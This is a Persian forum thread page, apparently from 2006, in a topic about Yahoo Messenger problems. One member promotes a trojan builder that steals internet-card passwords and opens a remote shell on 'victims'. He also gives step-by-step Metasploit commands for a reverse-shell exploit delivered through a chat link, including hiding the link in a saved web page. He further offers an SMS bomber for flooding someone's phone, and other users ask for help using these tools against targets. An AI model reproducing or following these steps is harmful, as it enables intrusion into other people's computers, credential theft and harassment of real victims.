تبلیغات :
ماهان سرور
آکوستیک ، فوم شانه تخم مرغی ، پنل صداگیر ، یونولیت
دستگاه جوجه کشی حرفه ای
فروش آنلاین لباس کودک
خرید فالوور ایرانی
خرید فالوور اینستاگرام
خرید ممبر تلگرام

[ + افزودن آگهی متنی جدید ]

صفحه 44 از 775 اولاول ... 344041424344454647485494144544 ... آخرآخر
نمايش نتايج 431 به 440 از 7750

نام تاپيک: مباحث و مشکلات نرم افزار یاهو مسنجرYahoo Messenger

حـــــرفـه ای *NashenaS*'s Avatar
    تاريخ عضويت
    Jan 2006
    محل سكونت
    ∞±

پيش فرض

نقل قول نوشته شده توسط signal2006
    اقا اشکان من همه اینها رو گشتم اما چند تایی رو که دانلود کردم کار نمیکردن اگه میشه یه سالمشو بزارین مرسی
    كدوم هارو منظورته كه كار نمي كردن بوتر ها؟
    چه نوع error به شما مي ده... فايل كم داره؟

تاريخ عضويت
    Jan 2006
    محل سكونت
    ∞±

پيش فرض iRcHaTaN Ps 7.1 با قابليت هاي جديد

‍‍نسخه جديد برنامه ي iRcHaTaN Ps كه مانند نسخه قبلي در ياهو 7 كار ميكنيد البته با قابليت هاي جديد مثل ارسال (user,pass,number) كارت اينترنتي | dial up password ‍‍‍‍ و گرفتن شل( دسترسي كامل به كام‍يوتر قرباني)

در اين نسخه از برنامه قابليت ارسال password كارت هاي اينترنتي افزوده شده و هم چنين شما در اين نسخه ميتوانيد از قرباني شل بگيريد و كنترل كامل سيستم قرباني را به عهده بگيريد و هم چنين قابليت ارسال email با سيستم injection افزوده شده كه مي تواند از فايروال نيز عبور كرده و ايميل ارسال كند .pm ارسالي در اين نسخه توسط قرباني قابل رويت نيست و شما مي توتانيد از 2 mode ايميل و pm هم زمان استفاده كنيد .حتي اگر قرباني ياهو مسنجر نداشته باشد password كارت اينترت او براي شما ارسال مي شود و هم چنين مي توانيد از وي شل بگيريد. ديگر امكانات برنامه در عكس برنامه قابل رويت مي باشد و ما بقي در help برنامه موجود است.

[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

تاريخ عضويت
    Jan 2006
    محل سكونت
    ∞±

پيش فرض هک از طریق چت بدون ازسال فایل

هک از طریق چت بدون ازسال فایل

در متدی جدید که با باگ موجود در Windows Fax Viewer کار می کند . شما لینکی برای قربانی در چت روم می فرستید و بعد از کلیک کردن آن لینک توسط قربانی به شما از وی Shell ( قابلیت کنترل کامل کامپیوتر وی) میگیرید نوع Shell در این روش از نوع Reverse می باشد و فابلیت عبور از ّFirewall را دارا ست .ابزار لازم در این کار همان Metasploit است که مجموعه باگ هاو ابزار های نفوذ می باشد

Metasploit framework

توجه : اگر قبلآ نسخه Metasploit framework-2.4 را دریافت کرده اید این باگ هنوز به آن اضافه نشده و شما بایستی در پوشه برنامه MSFupdate را بزنید تا باگ های جدید مانند ie_xp_pfv_metafile به آن اضافه شود. برای کنترل صحت update می توانید بعد از اجرای برنامه دستور show exploits را بزنید و لیست باگ ها را مشاهده و با دستور use از آن ها استفاده کنید بنابراین تایپ می کنید use ie_xp_pfv_metafile حال شما این exploit را اجرا کرده اید و بایستی یک سری مقادیر را به برنامه بدهید مانند ip شما و پورت کاربردی . نوع سیستم عامل قربانی . نوع payload (ارتباط ) . دراین با فرض اینکه ip من [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] باشد به برنامه مقدار دهی میکنم . بزنید set TARGET 0 و بعد آن بزنید set PAYLOAD win32_reverse و بعد ان

بزنید set HTTPHOST 217.216.30.40 و بعد آن

بزنید set LHOST 217.216.30.40

و در آخر بزنید exploit . حال برنامه یک لینک از ip شما به شما می دهد که در اینجا به من لینک [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] را می دهد و منتظر ارتباط با قربانی می ایستد . با کلیک قربانی روی این لینک شما در این برنامه shell از سیستم وی را مشاهده خواهید نمود .شما در این shell قادر به اجرای همه گونه فرمان بر روی سیستم قربانی می باشید به طور مثال Format یک درایو و پاک کردن فایل ها توسط دستورات dos. و انگار از سیستم قربانی وارد cmd شده اید . برای ارسال و گرفتن فایل هم می توانید به مقاله ی آموزشی که در سایت قرار داده شده رجوع کنید -

چون قربانی ممکن است به لینک شما شک کند و چون اینک ip شما است روی ان کلیک نکند .شما می توانید یک صفحه ی html از یک سایت به طور مثال یک صفحه از یک سایت .گالری عکس . جک و ... را save کنید و آن را با note pad باز کرده و کد زیر را در چند خط قبل انتهای آن past کنید.

موفق باشيد.
    Last edited by *AshKaN*; 08-04-2006 at 17:57.

تاريخ عضويت
    Jan 2006
    محل سكونت
    ∞±

پيش فرض Sms Bomber جدید

نسخه جدید V 2.0 . iRcHaTaN Sms BOmber که مانند نسحه ی فبلی قابلیت ارسال sms به تعداد زیاد به طور مجانی را دارد . تنها کافی است که شماره موبایل قربانی را وارد کرده bomb را بزنید تا به تعداد مشخص شده توسط شما برایش sms بفرستد. متن این sms ها مانند نسخه ی قبلی عدد بوده و قابل تغیر نیست و برای مدت محدودی کارایی دارد .ممکن است sms ها با یک فاصله زمانی کم یک جا ارسال شوند

موفق باشيد. (نه در خراب كردن موبايل مردم... در زندگي تون )

پروفشنال papiyoon's Avatar
    تاريخ عضويت
    Jun 2004

پيش فرض

نقل قول نوشته شده توسط *AshKaN*
    نسخه جدید V 2.0 . iRcHaTaN Sms BOmber که مانند نسحه ی فبلی قابلیت ارسال sms به تعداد زیاد به طور مجانی را دارد . تنها کافی است که شماره موبایل قربانی را وارد کرده bomb را بزنید تا به تعداد مشخص شده توسط شما برایش sms بفرستد. متن این sms ها مانند نسخه ی قبلی عدد بوده و قابل تغیر نیست و برای مدت محدودی کارایی دارد .ممکن است sms ها با یک فاصله زمانی کم یک جا ارسال شوند

موفق باشيد. (نه در خراب كردن موبايل مردم... در زندگي تون )
    من امتحان کردم کار نکرد
    کسی از این برنامه نتیجه گرفته ؟

تاريخ عضويت
    Jan 2006
    محل سكونت
    ∞±

پيش فرض

نقل قول نوشته شده توسط papiyoon
    من امتحان کردم کار نکرد
    کسی از این برنامه نتیجه گرفته ؟
    رو كدوم بد بخت امتحان كردي؟

آخر فروم باز j0l6's Avatar
    تاريخ عضويت
    Mar 2005
    محل سكونت
    torrents

پيش فرض

من هم رو خودم امتحان کردم کار نکرد البته ایران نیستم نمیدونم این محدودیت رو داره یا نه
    دوستان راهی سراغ دارین که بشه تشخیص داد لینکی که واست pm دادن ویروسی هستشیا به فایل سرور متصل شده؟؟
    قبلا با نگاه کردن به لینک و دیدن ای پی جای اسم سایت میشد حدس زد ولی یه جا خوندم که میشه اینو هم دور زد یعنی کاری کرد که ای پی نشون نده بلکه ادرس یه سایت باشه

پروفشنال papiyoon's Avatar
    تاريخ عضويت
    Jun 2004

پيش فرض

نقل قول نوشته شده توسط *AshKaN*
    رو كدوم بد بخت امتحان كردي؟
    روی شماره خودم امتحان کردم دریغ از 1 دونه sms

در آغاز فعالیت
    تاريخ عضويت
    Apr 2006

پيش فرض

اقا اشکان مثلا این irchatan-ps 7.1 را كه گذاشتي همه كاراشو ميكنم اين پيغام رو ميده server created successfully اگه ميشه بگين چكار كنم مرسي

تاريخ عضويت
    Jan 2006
    محل سكونت
    ∞±

پيش فرض

روی شماره خودم امتحان کردم دریغ از 1 دونه sms
    عجب دل و جراتي بابا

نقل قول نوشته شده توسط signal2006
    اقا اشکان مثلا این irchatan-ps 7.1 را كه گذاشتي همه كاراشو ميكنم اين پيغام رو ميده server created successfully اگه ميشه بگين چكار كنم مرسي
    خوب شما الان سرور رو با موفقيت ساختي ...
    حالا يه فايل ديگه به اون فايل هايي كه توي فولدر داشتي اضافه شده...
    روي اون به هيچ وجه نبايد كليك كنين چون خودتون هك مي شين (البته به وسيله خودت)..
    از help خيلي كمك ها مي توني بگيري..
    حالا اون فايل رو به روش هاي مختلف مي توني براي طرف بفرستي...
    و فلك زده رو هك كني...

Thread Information

Users Browsing this Thread

هم اکنون 1 کاربر در حال مشاهده این تاپیک میباشد. (0 کاربر عضو شده و 1 مهمان)

User Tag List

برچسب های این موضوع

قوانين ايجاد تاپيک در انجمن

• شما نمی توانید تاپیک ایحاد کنید
  • شما نمی توانید پاسخی ارسال کنید
  • شما نمی توانید فایل پیوست کنید
  • شما نمی توانید پاسخ خود را ویرایش کنید
  •